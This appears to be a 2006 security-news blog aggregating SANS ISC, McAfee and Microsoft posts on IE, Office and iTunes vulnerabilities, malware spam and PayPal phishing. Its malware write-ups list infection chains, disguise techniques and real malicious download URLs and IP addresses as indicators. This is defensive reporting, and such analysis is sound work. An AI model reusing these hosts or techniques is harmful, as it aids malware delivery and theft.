Chris Mosby at myITforum.com

Two new Internet Explorer vulnerabilities disclosed including PoC (NEW)

Published: 2006-06-30,
Last Updated: 2006-06-30 07:28:33 UTC by Bojan Zdrnja (Version: 3(click to highlight changes))

Two vulnerabilities in Internet Explorer were published yesterday to the Full-Disclosure mailing list along with their associated PoC code.

A critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) to trick a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site.  The currently available version of PoC that was published is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon.  The workaround for this appears to be disabling active scripting.

The second vulnerability is related to the handling of the object.documentElement.outerHTML property. The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user. This vulnerability can be potentially nasty as attackers can use it to retrieve data from other web sites user is logged into (for example, webmail) and harvest user credentials.  Several handlers have spent a little more time validating this particular issue and while it is a subtle exploit and rated a lower level risk, this issue has raised some of our neck hairs.

Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.

Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla FireFox.

We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.

** As another worthy 'Handler tools' mention that is applicable as a general protection tool which has been gaining increased use in the testing of malicious code and reviewing potentially malicious websites is the SandboxIE tool.  Browse safely over to http://www.sandboxie.com.

06/28/06
We have been getting comments about the statement of Firefox being vulnerable. After repeated testing, one of the handlers has confirmed that it is definitely vulnerable. The code found at Secunia will not catch vulnerable versions of Firefox but the original PoC found on FullDisclosure will work on Firefox.

UPDATE 06/30/06
After doing more research on this vulnerability and with great help from our readers (thanks to Dan and another reader) it seems that Mozilla Firefox is not affected by this vulnerability.

The (obvious) reason for this is that Firefox doesn't support the outerHTML property at all (innerHTML property is supported). As this property is not supported, the original context can't get any data from the HTML that was loaded into the <object> tag.

If you test this with the original PoC posted on Full Disclosure, you can notice that Firefox will load the target web page into the object tag, but the alert call (which is in the original context) will not be able to get any data. If you use Internet Explorer 6 this is not the case as the original context script can access data that was loaded into the object tag.

The fact that Firefox displays the target web page has nothing to do with this vulnerability (apart from the fact that it can confuse the user, but that's another story); so in this context it's no different than using an iframe.

Internet Explorer 7 is also not affected by this vulnerability.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

iTunes < 6.0.5 vulnerability & patch released (NEW)

Published: 2006-06-29,
Last Updated: 2006-06-29 21:49:43 UTC by Toby Kohlenberg (Version: 1)

Apple has released an update for iTunes that fixes an integer overflow in the AAC file parsing that can lead to code execution. Y'all want to get this one patched and updated.

http://docs.info.apple.com/article.html?artnum=61798
APPLE-SA-2006-06-29 iTunes 6.0.5

iTunes 6.0.5 is now available and, in addition to its other content,
fixes the following security issue:

CVE-ID:  CVE-2006-1467
Available for:  Mac OS X v10.2.8 or later, Windows XP / 2000
Impact:  An integer overflow in iTunes could cause a denial of
service or lead to the execution of arbitrary code
Description:  The AAC file parsing code in iTunes versions prior
to 6.0.5 contains an integer overflow vulnerability. Parsing a
maliciously-crafted AAC file could cause iTunes to terminate or
potentially execute arbitrary code. iTunes 6.0.5 addresses this
issue by improving the validation checks used when loading AAC
files. Credit to ATmaCA working with TippingPoint and the Zero Day
Initiative for reporting this issue.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Cisco Wireless Access Point Vulnerability Announced (NEW)

Published: 2006-06-29,
Last Updated: 2006-06-29 17:35:11 UTC by Toby Kohlenberg (Version: 1)

Cisco has released a vulnerability disclosure for their Wireless Access Points:

http://www.cisco.com/warp/public/707/cisco-sa-20060628-ap.shtml

The vuln is in the web interface for the APs and could allow wiping of the security config and access to the administrative interface without authentication.

To quote Cisco:

A vulnerability exists in the access point web-browser interface when Security > Admin Access is changed from Default Authentication (Global Password) to Local User List Only (Individual Passwords). This results in the access point being re-configured with no security, either Global Password or Individual Passwords, enabled. This allows for open access to the access point via the web-browser interface or via the console port with no validation of user credentials.

The following access points are affected if running Cisco IOS® Software Release 12.3(8)JA or 12.3(8)JA1 and are configured for web-interface management:

• 350 Wireless Access Point and Wireless Bridge
  
• 1100 Wireless Access Point
  
• 1130 Wireless Access Point
  
• 1200 Wireless Access Point
  
• 1240 Wireless Access Point
  
• 1310 Wireless Bridge
  
• 1410 Wireless Access Point

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

OK Symantec this is getting pretty ridiculous.  You have put out an update for these two products every month since 10.1 came out in March of 2006.  Don’t even get me started on your product before that. 

Now this latest “update” is over 400mb and appears to be a whole new CD. We have been trying to get this deployed at our company for over a year, and now it looks like we start testing all over again.

The SAVCE version has gone from 10.1.0.401 to 10.1.4.4000, so it looks like someone has been busy this last month.  My question is, was this product even FINISHED when you first released it??  Looks like Symantec has a long way to go before they have software testing down. 

Come on guys, I used to trust your software and recommend it to others.  Now I am not so sure I would.

For the full release notes on this “update”, go here: http://service1.symantec.com/SUPPORT/ent-security.nsf/docid_p/2006050314483048

Email Blast, From the Past

Tuesday June 27, 2006 at 4:39 pm CST
Posted by Craig Schmugar

A Microsoft Word document was mass-spammed today, which exploits MS01-034.  While this vulnerability was patched nearly 5 years ago, the DOC file can still deliver its payload if users allow Word to run the malicious macro within.  Spammed messages use attachment names such as apple_prices.zip, prices.zip, and sony_prices.zip.  The archive contains a file named my_notebook.doc, which contains a list of notebooks for sale:

• Apple MacBook Pro MA463LL/A 15.4&Prime Notebook PC
• HP Pavilion DV8230US 17&Prime Notebook PC
• Sony VAIO VGN-FS830/W 15.4&Prime Notebook PC

The DOC also file contains a macro, that drops a downloader trojan, that downloads a parasitic virus that is also a downloader. 

The infection trail can be represented like this:

Spammed email message -> ZIP attachment (prices.zip) ->
Malicious DOC file / Macro (my_notebook.doc) -> Dropped EXE file (666inse_1.exe) ->
Downloaded File (zmacro.txt) -> Downloader Files (…)

This is all contributed to the Sality virus author.  Sality is a parasitic infector that utilizes DLL injection, and encryption.  It also contains a dowloader payload to install Adware, remote access trojans, keyloggers, proxy servers, etc; yet another recent case of a parasitic virus delivering spyware.

Detection for the DOC file and dropped downloader trojan (666inse_1.exe) will be contained in the next DAT release as W97M/Dropexe and Generic Downloader.ab respectively.  Existing W32/Sality.t detection (released May 31, 2006) covers the dowloaded Sality virus.

Speaking of old vulnerabilities being targeted by malware, MS03-011 (patched for more than 3 years) is still on the list of top threats being reported by VirusScan Online customers (see Exploit-ByteVerify).  Again, this is exploited by the distributors of spyware in the shape of drive-by downloads.

McAfee Avert Labs Blog » Blog Archive » Email Blast, From the Past.

- http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx

Two new Internet Explorer vulnerabilities disclosed including PoC (NEW)

Published: 2006-06-28,
Last Updated: 2006-06-28 04:06:32 UTC by Bojan Zdrnja (Version: 1)

Two vulnerabilities in Internet Explorer were published yesterday to the Full-Disclosure mailing list along with their associated PoC code.

A critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) to trick a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site.  The currently available version of PoC that was published is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon.  The workaround for this appears to be disabling active scripting.

The second vulnerability is related to the handling of the object.documentElement.outerHTML property. The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user. This vulnerability can be potentially nasty as attackers can use it to retrieve data from other web sites user is logged into (for example, webmail) and harvest user credentials.  Several handlers have spent a little more time validating this particular issue and while it is a subtle exploit and rated a lower level risk, this issue has raised some of our neck hairs.

Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.

Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla FireFox.

We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.

** As another worthy 'Handler tools' mention that is applicable as a general protection tool which has been gaining increased use in the testing of malicious code and reviewing potentially malicious websites is the SandboxIE tool.  Browse safely over to http://www.sandboxie.com.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Word macro trojan dropper and (another) downloader (NEW)

Published: 2006-06-27,
Last Updated: 2006-06-27 22:41:08 UTC by Bojan Zdrnja (Version: 1)

We've seen a lot of new malware being spammed in last couple of hours.

First malware exploits an old vulnerability in Microsoft Word, MS01-034 (http://www.microsoft.com/technet/security/Bulletin/MS01-034.mspx). This vulnerability allows an attacker to execute embedded macros no matter what the user set his Microsoft Word to. Of course, as this is a pretty old vulnerability, only terribly outdated installations will be affected. If you are running any newer version of Microsoft Word, macro settings are on High by default so only macros signed by trusted sources are executed - all other macros are disabled. A user would have to change this setting to Medium (so they get asked) or Low in order to run this macro.The Word document comes in a ZIP file and, once executed, installs a Trojan. Detection on the Word document is pretty good at the moment.
The document pretends to list computer prices:



The other malware is a plain old (and boring?) downloader, but we've seen a large number of e-mails being spammed with it. The downloader uses typical social engineering to trick user into opening the archive. Besides the e-mail telling user there's a nice photo in the attachment, the executable name will be like DC0019.JPG__[lots of _]__JPG.exe.
The executable always seems to be in a ZIP archive, but sometimes it is encrypted (and in this case the password is in the e-mail body) and sometimes it's not.

Once executed, the downloader will install on the system and try to download two files:

http:// 206.204.52.54  /img/util/logo_nav.jpg

which is a Symantec logo (more social engineering) and

http:// 218.239.223.224 /flash/menu.swf

this is a site in Korea and the last time we checked the file was not there.

AV detection is pretty low at the moment and only couple of AV products detected this: Symantec, NOD32, Norman, Trend Micro, Sophos. They either detect it as a downloader or generically (Bloodhound.W32.EP in Symantec's case).

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Excel Issue Scorecard

Published: 2006-06-25,
Last Updated: 2006-06-25 01:00:02 UTC by Kevin Liston (Version: 2(click to highlight changes))

To help clearly identify the issues, exploit code and remedy related to the recently announce Excel vulnerabilities, I offer this humble correlation.  This information comes from Microsoft, Mitre, and vigilant readers sending in tips.  My thanks go to all.

CVE-2006-3059 aka "Excel Repair Mode" http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B

CVE-2006-3086 aka "Long Hyperlink"   http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples

CVE-2006-3014 aka "Shockwave vulnerability"
Exploited by proof of concept code Flemex.A
The workaround is a killbit

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Reminder about MS06-025 (NEW)

Published: 2006-06-25,
Last Updated: 2006-06-25 12:35:54 UTC by Kevin Liston (Version: 2(click to highlight changes))

The original patch from Microsoft caused issues with dialup.  Revised  patch development was discussed by Microsoft.  Exploit code is available that leverages this issue.  This allows an authenticated attacker to execute arbitrary code on Win2kSP4, Windows 2003 and XP SP2 systems (we can't comment on anything earlier because they're no longer supported :-P.)  Previous versions allow unauthenticated attackers to execute arbitrary code, your garden-variety "bad-thing(tm)."

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

- http://www.microsoft.com/technet/security/bulletin/ms06-024.mspx

- http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx

- http://www.microsoft.com/technet/security/bulletin/ms06-027.mspx

- http://www.microsoft.com/technet/security/bulletin/ms06-028.mspx

- http://www.microsoft.com/technet/security/bulletin/ms06-032.mspx

- http://www.microsoft.com/technet/security/advisory/921365.mspx

Yahoo! Login Server Problems (NEW)

Published: 2006-06-21,
Last Updated: 2006-06-21 15:06:36 UTC by Scott Fendley (Version: 2(click to highlight changes))

We have received a number of reports indicating problems with various parts of Yahoo! services (mail, IM, groups). These services all seem to work properly with cached credentials, so we suspect that there is a problem with part of the authentication system.  We have _no_ confirmed information of what is the source of these difficulties, but will continue to monitor and update this diary when more information is available.

Update: One of our readers, Nick, noted a possibility of what is going on. XDisclose released an advisory about Yahoo! vulnerabilities located at http://www.xdisclose.com/XD100001.txt . With so little real concrete evidence, I do not know if this is coincidental or not.

<Disclaimer>  We cannot confirm what is the true source of the authentication failures of this morning.  So do not yell at us if the above is truely coincidental or related to maintenance go awry regarding it, or something else entirely different.   </disclaimer>

ISC Handlers

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Yahoo! Login Server Problems (NEW)

Published: 2006-06-21,
Last Updated: 2006-06-21 13:45:23 UTC by Scott Fendley (Version: 1)

We have received a number of reports indicating problems with various parts of Yahoo! services (mail, IM, groups). These services all seem to work properly with cached credentials, so we suspect that there is a problem with part of the authentication system.  We have _no_ confirmed information of what is the source of these difficulties, but will continue to monitor and update this diary when more information is available.

ISC Handlers

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Microsoft patching more critical vulnerabilities

Tuesday June 20, 2006 at 4:15 pm CST
Posted by Monty Ijzerman

If you have the feeling that Microsoft could be addressing more critical vulnerabilities, you may be right. Avert Labs has counted the number of vulnerabilities rated Critical and Important over the last 2 1/2 year and plotted them cumulative by year:

The top graph shows that this year Microsoft has already addressed as many critical vulnerabilities as in the whole of 2005. The bottom graph shows that the number of important vulnerabilities has not changed significantly.

Last week we wrote that we may see the start of a vulnerability growth trend fueled by bounty programs and organized crime. While too early to tell, the statistics indicate that Microsoft seems to be addressing an increasing number of critical vulnerabilities.

McAfee Avert Labs Blog » Blog Archive » Microsoft patching more critical vulnerabilities.

New Excel 0day (Are we evolving or going in circles?) (NEW)

Published: 2006-06-20,
Last Updated: 2006-06-20 16:05:34 UTC by Kyle Haugsness (Version: 1)

(Now before I get hatemail from all the Microsoft fanboys out there, please note that these comments are not derogatory towards Microsoft.  Microsoft has like 110% market share according to their research, so that's why they get all the attention.)

Today there is news of another 0day vulnerability in Microsoft Office.  You can check your favorite vulnerability notification service for all the gory details.  Someone wrote asking for comments and honestly I don't have any step-by-step instructions for defending against this specific threat.  All of the general high-level recommendations from the MS Word 0day a couple of weeks ago still apply.  Perhaps we will have something more detailed later when the details are more clear.

Instead, here are some thoughts about the current state of vulnerability discoveries.  If you have followed along with the industry in the last couple of years, you have probably noticed that remote root/administrator type of bugs have slowly disappeared and now seem to be fairly rare.  Most vulnerability researchers that are publishing advisories now seem to focus on web applications and clients (web browsers, Office, etc).  I am honestly expecting to see a healthy stream of client vulnerabilities in Office applications over the next 2-3 years.  Several years ago, nobody cared too much about exploitable bugs in client side applications because remote bugs were still readily available.  Of course, given the recent media attention about the MS Word 0day exploit, alot of vulnerability researchers are now hitting Word with every available fuzzer that they have.

So now we have a scenario where there will be a good number of 0day vulnerabilities discovered in client-side applications like MS Office and OpenOffice.  Users will be advised not to open documents from unknown persons.  So have we evolved?  Or have we just jumped back in time ten years when every aspiring script kiddie was writing VBA Macro viruses?

Keep reading for another article about 0day...

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Comments on 0day (NEW)

Published: 2006-06-20,
Last Updated: 2006-06-20 17:34:08 UTC by Kyle Haugsness (Version: 1)

Given the recent rumors about 0day in IIS and confirmed 0day in several different Microsoft Office applications, these comments seem appropriate.

The first question I pose is: why the sudden increase in vulnerabilities that are published as 0day instead of responsibly disclosed?  This isn't intended to be a comment on full-disclosure.  But if you look over the past couple of years, almost all vulnerabilities that are discovered by actual researchers (not criminals) were disclosed responsibly to Microsoft.  Is the researching community becoming disenchanted with the long Microsoft patch cycle?  Is there more incentive (fame) for researchers to disclose full details to bugtraq or full-disclosure?  Is there more incentive (financial) to sell an exploit to iDefense, 3com, or the highest bidder on eBay?  If you are a software vendor, what are you doing to ensure that vulnerability researchers are kept happy and disclosing security bugs responsibly?

Now here is where I can feel people firing up their flamethrowers.  There has been lots of panic and rumors recently about 0day bugs.  And it isn't just focused on Microsoft products.  We occassionally get e-mail asking if we know about 0day in OpenSSH, Apache, and PHP.  The question shouldn't be whether 0day exists.  Because 0day exists and it will always exist.

The question is whether you or your organization would be the target of such an exploit?  The time is long gone for an exploit author to embed his nice 0day into a worm and let it run rampant through the Internet.  Today, 0day exploits are more likely to be used for military purposes, financial crime, and possibly terrorist activities (although, probably not).

So in reality, the organizations that really need to be concerned about 0day are the ones responsible for protecting military/government assets, financial institutions, and critical infrastructure agencies.  Since you know 0day exists and if you are a target, what are you doing to protect yourself?  How do you protect against, detect, and respond to unknown vulnerabilities?

For the rest of the folks out there (small/medium businesses, hobbyists)... Should you worry about 0day?  Usually not, but if you have all the other critical security components in place then go ahead.

I'm curious to know what kinds of 0day protection systems people have in place?  In the *NIX world, there are some fairly decent (and free) options for protection:  Grsecurity, NSA SE Linux, Systrace, LIDS, ProPolice GCC patch and others.  How about the Windows side?  There doesn't seem to be much for the folks without hardcore $$.  CORE security has something new called Force (http://force.coresecurity.com/) that looks quite promising.  There is also a good list of commercial products for Windows and some comments compiled by fellow handler Jason Lam here: http://isc.sans.org/diary.php?storyid=635

In summary, you should expect 0day to be alive and well for your favorite operating systems, daemons, and applications.  And if it concerns you, then do something about it instead of waiting to get smacked with it later.  You will sleep better at night and not be frustrated at your favorite software vendor when they take 6+ months to patch simple little vulnerabilities.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: June 19, 2006

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

  * MS06-025

Bulletin Information:

=====================

* MS06-025

  - http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx

  - Reason for Revision: Bulletin revised FAQ and Vulnerability Details

    sections to provide clarification on affected RASMAN

    component. Caveats section updated to include known issues. 

  - Originally posted: June 13, 2006

  - Updated: June 19, 2006

  - Bulletin Severity Rating: Critical

  - Version: 1.1

Excel new vuln FAQ

Published: 2006-06-19,
Last Updated: 2006-06-19 21:08:13 UTC by Adrien de Beaupre (Version: 2(click to highlight changes))

Update 2 <06/19/2006 21:00 UTC>  Microsoft released an official advisory a little while ago which details other workarounds for the Microsoft Excel Remote Code Vulnerability.  This advisory is located at http://www.microsoft.com/technet/security/advisory/921365.mspx.   Please read the advisory and see which of the suggested actions fits your environment the best.  

Update: A perl script was published on Milw0rm, which appears to exploit *some* Excel vulnerability. It creates a spreadsheet inclusing a very long URL. Once the user click on the URL, Excel will crash. As our reader Dominic pointed out, the script does not claim to be the 0day under discussion. Virustotal does not trigger any signatures based on the Excel file generated by the exploit.

Juha-Matti, a regular ISC contributor has written up some information into a FAQ. This is with regards to a recently discovered previously unknown vulnerability in Microsoft Excel. Gotten tired of the phrase '0day'?  I sure have.

http://blogs.securiteam.com/?p=451

Although I do not entirely agree with all of his advice, I think that the first and only defense is - defense in depth.
Do NOT rely solely on antivirus.
Do NOT rely solely on filtering by extension.
Do NOT open Excel files that appear unsolicited in your mailbox.
No single tool or measure is sufficient.

I am hoping that the point is getting accross, do not rely on traditional defensive measures, it is quite likely they will prove inadequate against a custom made targeted trojan built just to penetrate your infrastructure. Particularly using an undisclosed vulnerability. No signature based tool can help you in this case.

Cheers,
Adrien
(Maddison's Baba)

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Empty emails?

Published: 2006-06-18,
Last Updated: 2006-06-18 19:29:26 UTC by Adrien de Beaupre (Version: 1)

I got the first completely empty email sometime late friday evening, and deleted it without investigating any further. Then I received two more Saturday morning. Now I've gotten almost a dozen, each from a different netblock around the world, and sent to different domains. The SANS NOC has seen 500+. The Internet Storm Center has gotten two queries about them.

There is some speculation it may be malware related, as in a poorly written piece of code spewing out empty emails. One other theory involves confirming known good addresses to seed a new piece of malware or spam. Is this related to Yamanner (sp?)?

Cheers,
Adrien

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Update on the Paypal Phish Phlaw (NEW)

Published: 2006-06-17,
Last Updated: 2006-06-17 13:57:05 UTC by Deborah Hale (Version: 1)

According to an article posted at news.com Paypal has fixed the flaw in their website that was reported in yesterdays Diary.

PayPal fixes phishing hole

Thanks to one of our readers for supplying us with the information.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Known Issues for the MS06-025 (NEW)

Published: 2006-06-17,
Last Updated: 2006-06-17 12:52:46 UTC by Deborah Hale (Version: 1)

It appears Microsoft Security Response Center has issued a known issues update to MS06-025.  According to Stephen Toulouse at the Microsoft Response Center Blog the update has broken dial-up scripting for those that are still using dial-ups. 

Microsoft Security Response Blog

Thanks to Juha-Matti for calling this to our attention.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Adobe Reader Update (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 13:16:40 UTC by Chris Carboni (Version: 1)

Adobe has released an update for reader in which "several security bug fixes have been made, with one considered critical for the Macintosh OS and several considered to have a low rating for Windows."

Details can be found on Adobe Support Knowledgebase article 327817

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Phishes, Phlaws and Phurther Network Phollies (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 17:16:51 UTC by Chris Carboni (Version: 1)

Pay Pal Phlaw?

We've recieved a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users.

The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.

When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page.

Logging in sends the PayPal username and password to the bad guys and causes another page asking for more information (social security number, credit card number ...) to remove the limits on the access of thier account.

More to come as we confirm information.


FDIC Phish

Juha-Matti dropped us a link to a newly added US-Cert Advisory detailing a scam targeting customers of FDIC insured institutions.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Trojan Frog on the Loose

Thursday June 15, 2006 at 7:16 am CST
Posted by Craig Schmugar

Here’s a trick the traffall.biz (aka iframecash.biz) gang has been using for at least a few weeks. In addition to their usual Internet Explorer exploitation to install downloading downloader trojans (downloading downloading downloaders in many cases), they’ve been obfuscating some of the traffic by hiding exe files within JPG files. To a network administrator they would see HTTP get requests to traffall.biz/pic/[filename].jpg Which would appear normal (unless you were up-to-date on your bad domain list). And if you were to download the ‘.jpg’ files they would indeed first appear to be just an image of a goofy frog:

Here’s a Hex dump of the start of the JPG file:

In the middle of the file, we can see the encrypted executable (the cursor is at the start):

Once the file has been downloaded, the trojan that fetched the file in the first place strips off the image, decrypts the exe, and launches it (and as you may have guessed, the ‘it’ in this case is yet another downloader). Ironically the trojans that employ this tactic usually download other files that do not use this tactic, so it’s less effective in hiding a compromised machine from a network admin. So why else do it? The main reason may be an attempt to slip passed anti-virus and anti-spyware researchers and automated analysis tools. Basic file-type tools will likely see the files as valid JPEGs, which could lead to early dismissal during analysis.

The group behind this remains to be one of the most active spyware creators out there.

McAfee Avert Labs Blog » Blog Archive » Trojan Frog on the Loose.

Reports of Excel 0-Day (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 13:10:51 UTC by Chris Carboni (Version: 1)

Microsoft has received a report of a new 0-day vulnerability involving Excel.  They are currently investigating this issue and will issue more information on workarounds as it becomes available.  They are currently blogging about it at http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx so check that site for more information as it becomes available.

In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.

Update - We've recieved reports (Thanks Juha-Matti) that Symantec is detecting this attack.

According to the mdropper.j description, mdropper.j is used to drop Downloader.Booli.A which then exploits Excel.

The Symantec website also reports ..

Downloader.Booli.A may arrive on the compromised computer, dropped by Trojan.Mdropper.J, with the following name:

%System%\svc.exe

Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

When Downloader.Booli.A is executed, it performs the following actions:

1. Attempts to run Internet Explorer and inject its code into Internet Explorer to potentially bypass firewalls.
   
2. Attempts to download a file from the following location:
   [http://]210.6.90.153:7890/svcho[REMOVED]
   Note: At the time of writing the remote file was not available.
   
3. Saves the file as the following and if the download was successful, executes the file:
   c:\temp.exe
   
4. Creates an empty file before exiting:
   c:\bool.ini

We'll pass on more information as we receive it.

-Chris

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Reports of a new vulnerability in Microsoft Excel

Hi everyone, Mike Reavey here.  We've received a single report from a customer being impacted by an attack using a new vulnerability in Microsoft Excel.

 

Here's what we know: In order for this attack to be carried out, a user must first open a malicious Excel document that is sent as an email attachment or otherwise provided to them by an attacker.  (note that opening it out of email will prompt you to be careful about opening the attachment) So remember to be very careful opening unsolicited attachments from both known and unknown sources.

 

We’ve activated our security response process and we have added detection to the Windows Live Safety Center today for up-to-date removal of malicious software that attempts to exploit the vulnerability.  The Windows Live Safety Center is located at the following website: 

 

http://safety.live.com

 

We’re also actively sharing that information with our Microsoft Security Response Alliance partners so that their detection can be up to date to detect and remove attacks. We’ve got the Office team engaged of course and they are hard at work investigating the vulnerability. 

 

As always, customers who believe they are affected can contact Product Support Services.  You can contact Product Support Services in North America for help with security update issues or viruses at no charge using the PC Safety line (1866-PCSAFETY) and international customers by using any method found at this location: http://support.microsoft.com/security.

 

We’ll post more information here on the blog as we get it.

 

-Mike

 

*This posting is provided "AS IS" with no warranties, and confers no rights.*

 

Published Friday, June 16, 2006 12:09 AM by stepto

Welcome to the Microsoft Security Response Center Blog! : Reports of a new vulnerability in Microsoft Excel.

Reports of Excel 0-Day (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 06:02:01 UTC by Scott Fendley (Version: 1)

Microsoft has received a report of a new 0-day vulnerability involving Excel.  They are currently investigating this issue and will issue more information on workarounds as it becomes available.  They are currently blogging about it at http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx so check that site for more information as it becomes available.

In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.